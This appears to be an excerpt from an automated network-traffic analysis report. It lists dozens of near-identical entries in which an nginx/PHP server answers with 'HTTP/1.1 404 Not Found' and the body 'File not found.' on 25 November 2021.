        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 Nov 2021 09:51:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeVary: Accept-EncodingX-Powered-By: PHP/7.0.33X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
